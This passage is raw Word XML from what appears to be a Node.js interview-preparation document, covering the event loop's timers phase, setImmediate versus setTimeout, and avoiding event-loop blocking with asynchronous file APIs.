          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>process.nextTick runs before Promise microtasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627880E3" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="702"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Timeout executes in the Timers Phase afterward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186DBC17" w14:textId="77777777" w:rsidR="00665E4E" w:rsidRPr="00DA2F32" w:rsidRDefault="00665E4E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D9B4B3A" w14:textId="44D58CF5" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc178383265"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the event loop in Node.js, and why is it important?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="7CF1EA87" w14:textId="77777777" w:rsidR="00665E4E" w:rsidRPr="00DA2F32" w:rsidRDefault="00665E4E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30137293" w14:textId="67BF4629" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc178383266"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What happens in the timers phase of the event loop?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="5A7ADD94" w14:textId="77777777" w:rsidR="000D617F" w:rsidRPr="00DA2F32" w:rsidRDefault="000D617F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What Happens in the Timers Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36936EE0" w14:textId="77777777" w:rsidR="000D617F" w:rsidRPr="00DA2F32" w:rsidRDefault="000D617F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Execution of Timer Callbacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511167BB" w14:textId="77777777" w:rsidR="000D617F" w:rsidRPr="00DA2F32" w:rsidRDefault="000D617F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>During this phase, Node.js checks for any timers that are due to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C56167" w14:textId="77777777" w:rsidR="000D617F" w:rsidRPr="00DA2F32" w:rsidRDefault="000D617F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Callbacks associated with setTimeout() and setInterval() are executed if their specified delay has elapsed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6636788B" w14:textId="77777777" w:rsidR="000D617F" w:rsidRPr="00DA2F32" w:rsidRDefault="000D617F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Delay Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BB5B50" w14:textId="77777777" w:rsidR="000D617F" w:rsidRPr="00DA2F32" w:rsidRDefault="000D617F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The delay for setTimeout() and setInterval() is specified in milliseconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AAFEB3" w14:textId="77777777" w:rsidR="000D617F" w:rsidRPr="00DA2F32" w:rsidRDefault="000D617F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If a timer is set for 0 milliseconds, it does not guarantee immediate execution; rather, it will be added to the queue to be executed in the next iteration of the event loop after the current synchronous code completes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FA15C8" w14:textId="77777777" w:rsidR="000D617F" w:rsidRPr="00DA2F32" w:rsidRDefault="000D617F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Callback Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F228421" w14:textId="77777777" w:rsidR="000D617F" w:rsidRPr="00DA2F32" w:rsidRDefault="000D617F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Each eligible timer's callback is executed in the order they were scheduled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A33C419" w14:textId="77777777" w:rsidR="000D617F" w:rsidRPr="00DA2F32" w:rsidRDefault="000D617F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If multiple timers are due, their callbacks will be executed in the order they were created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF6D251" w14:textId="77777777" w:rsidR="000D617F" w:rsidRPr="00DA2F32" w:rsidRDefault="000D617F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Handling of setInterval():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEF4219" w14:textId="77777777" w:rsidR="000D617F" w:rsidRPr="00DA2F32" w:rsidRDefault="000D617F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If setInterval() is used, the callback is executed at regular intervals. After executing the callback, a new timer is set for the next interval, allowing the callback to be called again after the specified delay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF51F12" w14:textId="77777777" w:rsidR="00665E4E" w:rsidRPr="00DA2F32" w:rsidRDefault="00665E4E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B1AEC44" w14:textId="18B5C1BE" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc178383267"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the difference between setImmediate() and setTimeout in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w14:paraId="2EFEB4EF" w14:textId="77777777" w:rsidR="00665E4E" w:rsidRPr="00DA2F32" w:rsidRDefault="00665E4E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B5888C9" w14:textId="7C700B96" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc178383268"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How can you prevent the event loop from being blocked?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="0D8E5A85"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rPr>
        <w:t>1. Avoid Synchronous Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29334F4C" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="242"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Problem</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Synchronous code executes in a blocking manner, preventing the event loop from processing other tasks until the synchronous code completes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3075EC2E" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="242"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use asynchronous APIs and avoid blocking operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431FEA4A"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Blocking operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6BED8D"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blockingOperation() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59851DCD"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start = Date.now();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D52AAC"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while (Date.now() - start &lt; 1000) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D2E339"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Simulate blocking work for 1 second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0363DA47"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8B97DBB"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console.log('Blocking operation finished');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1941A7"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6F891E3" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="790192CB"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Non-blocking alternative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C697413"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nonBlockingOperation() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0496E056"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setTimeout(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B28F825"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console.log('Non-blocking operation finished');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC4600F"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1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A5F744"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70BC10B" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48F9BEED"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nonBlockingOperation();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301E7492"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rPr>
        <w:t>2. Use Asynchronous APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6AE327" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Problem</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Using synchronous APIs (e.g., fs.readFileSync) can block the event loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E990809" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Prefer asynchronous versions (e.g., fs.readFile) that use callbacks or promises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B67F3D"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543C20A0" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21BC6F52"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Synchronous API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5507646B"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dataSync = fs.readFileSync('file.txt');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A44F97"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console.log('Synchronous read:', dataSync.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158E0ADB" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0543337A"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Asynchronous API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1A8078"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fs.readFile('file.txt', (err, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BF81CA"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22E30883"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console.log('Asynchronous read:', data.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACA532B"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EE580B2"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rPr>
        <w:t>3. Use setImmediate and process.nextTick</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0587120C" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="244"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Problem</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Long-running synchronous code can block the event loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CC009F" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="244"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
